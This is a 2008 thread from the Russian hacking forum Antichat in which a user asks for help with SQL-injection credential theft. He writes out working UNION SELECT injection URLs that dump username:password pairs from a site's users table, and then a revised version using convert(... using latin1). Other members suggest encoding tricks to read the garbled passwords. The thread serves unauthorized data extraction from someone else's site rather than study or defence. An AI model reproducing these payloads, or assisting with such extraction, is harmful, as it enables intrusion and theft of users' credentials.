ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

абра-кадабра в паролях пользователей
  #1  
Старый 26.05.2008, 13:45
Аватар для mr.celt
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию абра-кадабра в паролях пользователей

Доброго дня античатовцы.
Вопрос следующий: на сайте нашел скуль, разделался с ней как написано в учебниках, в результате получил такую инъекцию
site.com/details.php?id=-5'+union+select+1,concat(username,char(58),passwor d),3+from+users_m_t+limit+10,1/*
по идеи должны вываливаться пары логин:пароль, но тут облом вышел, получаю вот что
shilpa:^��f�
patelph1:g�r1�n ну и т.д...
Что это за каракули в паролях?
Думал дело в кодировке, но смена не помогла.
 
Ответить с цитированием

  #2  
Старый 26.05.2008, 14:20
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Посмотри в какой кодировке тебе отдаётся страница... Проблема как раз в кодировке, возможно это можно обойти с помощью Convert... Без ссылки не могу сказать более точно...
 
Ответить с цитированием

  #3  
Старый 26.05.2008, 14:21
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

либо покоцаные, либо кодировка не та, либо попробуй using latin1 и т.п.
 
Ответить с цитированием

  #4  
Старый 26.05.2008, 14:39
Аватар для WeddRRRyss
WeddRRRyss
Banned
Регистрация: 15.01.2008
Сообщений: 63
Провел на форуме:
399884

Репутация: 46
Отправить сообщение для WeddRRRyss с помощью ICQ
По умолчанию

Пассы просто захешированы. Походу не в мд5, а в чем то другом.
 
Ответить с цитированием

  #5  
Старый 26.05.2008, 14:50
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

Цитата:
Сообщение от WeddRRRyss  
Пассы просто захешированы. Походу не в мд5, а в чем то другом.
Это не хеш!Имхо это кодировка !
 
Ответить с цитированием

  #6  
Старый 26.05.2008, 14:52
Аватар для WeddRRRyss
WeddRRRyss
Banned
Регистрация: 15.01.2008
Сообщений: 63
Провел на форуме:
399884

Репутация: 46
Отправить сообщение для WeddRRRyss с помощью ICQ
По умолчанию

Цитата:
Сообщение от S00pY  
Это не хеш!Имхо это кодировка !
Если кодировка, то еще проще. не придется брутить. Главное понять в чем закодированны пасс.
 
Ответить с цитированием

  #7  
Старый 26.05.2008, 14:56
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

встречался однажды с такой херью
попробуй поюзать convert()
 
Ответить с цитированием

  #8  
Старый 26.05.2008, 15:42
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

мне обычно помогает cast( ... as binary)
 
Ответить с цитированием

  #9  
Старый 26.05.2008, 16:53
Аватар для mr.celt
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Цитата:
Сообщение от $n@ke  
либо покоцаные, либо кодировка не та, либо попробуй using latin1 и т.п.
попробовал вот так
http://site.com/details.php?id=-5'+union+select+1,concat(username,char(58),convert (password+using+latin1)),3+from+users_m_t+limit+10 ,1/*
те же каракули

при использовании cast (... as binary) тоже ничего хорошего.

Последний раз редактировалось mr.celt; 26.05.2008 в 17:35..
 
Ответить с цитированием

  #10  
Старый 26.05.2008, 18:41
Аватар для Shred
Shred
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037

Репутация: 73
По умолчанию

в какой кодировке сама страница?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подбор SAM/SMB/NetBios/Кэш паролей Xcontrol212 АнтиАдмин 0 13.03.2008 17:57
Новость: WiMax - 40 млн пользователей к 2013 году Mr. P.S. Беспроводные технологии/WPAN/WLAN 0 19.01.2008 00:23
Администрация «Живого Журнала» позаботилась о безопасности пользователей dinar_007 Мировые новости 0 25.01.2006 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ